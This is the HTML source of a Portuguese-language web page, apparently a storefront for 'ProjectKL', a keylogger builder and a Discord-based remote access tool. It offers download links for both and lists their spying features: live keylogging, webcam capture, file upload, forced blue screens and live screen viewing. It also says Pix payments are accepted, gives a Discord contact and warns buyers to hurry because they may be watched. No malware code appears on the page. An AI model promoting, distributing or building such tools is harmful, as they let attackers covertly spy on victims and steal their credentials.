<!DOCTYPE html><html>
<script src="https://kit.fontawesome.com/d0e578438c.js" crossorigin="anonymous"></script>

<link rel="stylesheet" type="text/css" href="css/banner-styles.css">
<link rel="stylesheet" type="text/css" href="css/iconochive.css">
<style>
   a {
       text-decoration: none;
       text-shadow: -1px -1px 0 #000, 1px -1px 0 #000, -1px 1px 0 #000, 1px 1px 0 #000;
       font-family: courier new, Courier, Monaco;
       font-style: normal;
       font-weight: 500;
       font-size: 8pt;
       z-index: 10;
       color: #fff;
   }
   a:hover {
       font-weight: 700;
   }
   body {
       background-color: #000;
       color: #fff;
   }
   pre {
       font-size: 8pt;
       font-family: courier new, Courier, Monaco;
       padding-top: 2.5%;
       padding-left: .5%;
       text-shadow: -1px -1px 0 #000, 1px -1px 0 #000, -1px 1px 0 #000, 1px 1px 0 #000;
   }
   .bruh {
       font-size: 16pt;
   }
   .bruh:hover {
       filter: drop-shadow(0px 0px 2px white);
   }
   .video-background {
       background: #000;
       position: fixed;
       top: 0;
       right: 0;
       bottom: 0;
       left: 0;
       z-index: -99;
   }
   
   .video-foreground, .video-background iframe {
       width: 100vw;
       height: 100vh;
       transform: scale(1.055);
       pointer-events: none;
   }
   .ytplayer {
       pointer-events: none;
   }
</style>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <title>KL by Ant0ny</title>
   <link rel="icon" href="images/logo.png">
   <link rel="stylesheet" href="css/styles.css" type="text/css">
   <meta property="og:type" content="website">
   <meta property="og:title" content="ProjectKL - KL Website">
   <meta property="og:description" content="O Site oficial do ProjectKL">
   <meta name="author" content="Ant0ny">

<body style="margin: 0">
      
    
    
  
<script type="text/javascript">
</script>

 
<pre><a href>ProjectKL</a>
Made by Ant0ny

<b>[info]</b>
<b>Project KeyLogger</b>

<b>{Install KL}</b>

<b>- KL Makerz V7 -</b>
<a href="download.html">download</a>
<a href="DiscordRAT.rar">KL RAT (Testes...)</a>


<a>Aceitando</a>

<i title="Pix" class="fab bruh fa-pix" aria-hidden="true"></i><span class="sr-only">Pix</span>


<b>[contato]</b>

<a style="color: #ff0000;">[Aviso] seja rapido, você pode estar sendo observado!</a>


<i href="https://google.com/" class="fab bruh fa-discord"></i> <a><a href="https://discord.com/users/140104733498146816">kkqmliga#0000</a>

<b>[Pachts Do KL]</b>
- KL Keylogger Live
- Webcam
- uploader
- Tela azul
- Blocker / Unlocker
- Pc Live


<b>[Made By]</b>
- Ant0ny
</a></pre>
</body></html>
